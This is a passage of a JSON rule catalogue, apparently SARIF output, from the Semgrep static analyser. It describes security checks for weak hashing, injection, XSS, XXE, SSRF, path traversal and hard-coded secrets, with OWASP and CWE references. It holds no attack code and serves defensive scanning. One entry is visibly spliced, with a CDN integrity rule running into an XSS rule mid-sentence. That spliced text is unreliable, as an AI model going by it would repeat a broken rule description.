hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash","id":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","name":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.passlib.passlib-insecure-hash.passlib-insecure-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"help":{"markdown":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket","id":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","name":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.unencrypted-socket.unencrypted-socket"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"help":{"markdown":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption)\n - [https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22](https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22)\n - [https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/](https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/](https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/)\n","text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","id":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","name":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.pg-express.pg-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.pg-express.pg-express","id":"javascript.express.db.pg-express.pg-express","name":"javascript.express.db.pg-express.pg-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.pg-express.pg-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","id":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","name":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","id":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","name":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request)\n - [https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html](https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html)\n - [https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet](https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet)\n","text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","id":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","name":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Consuming CDNs without including a SubResource Integrity (SRI) can expose your application and its users to compromised code. SRIs allow you to consume specific versions of content where if even a single byte is compromised, the resource will not be loaded. Add an integrity attribute to your ` is not properly encoded."},"help":{"markdown":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded."},"helpUri":"https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json","id":"csharp.razor.security.html-raw-json.html-raw-json","name":"csharp.razor.security.html-raw-json.html-raw-json","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.razor.security.html-raw-json.html-raw-json"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities."},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-expat-xxe.express-expat-xxe)\n - [https://github.com/astro/node-expat](https://github.com/astro/node-expat)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-expat-xxe.express-expat-xxe","id":"javascript.express.security.express-expat-xxe.express-expat-xxe","name":"javascript.express.security.express-expat-xxe.express-expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-expat-xxe.express-expat-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"help":{"markdown":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request)\n - [https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection](https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection)\n","text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","id":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","name":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"help":{"markdown":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.distributed.security.require-encryption)\n - [https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters](https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters)\n","text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"helpUri":"https://semgrep.dev/r/python.distributed.security.require-encryption","id":"python.distributed.security.require-encryption","name":"python.distributed.security.require-encryption","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.distributed.security.require-encryption"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","id":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","name":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"help":{"markdown":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression)\n - [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!)\n","text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","id":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","name":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"help":{"markdown":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall","id":"ruby.lang.security.dangerous-syscall.dangerous-syscall","name":"ruby.lang.security.dangerous-syscall.dangerous-syscall","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-syscall.dangerous-syscall"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","id":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","name":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"help":{"markdown":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","id":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","name":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","id":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","name":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask","id":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","name":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-shelve-flask.tainted-shelve-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs)\n - 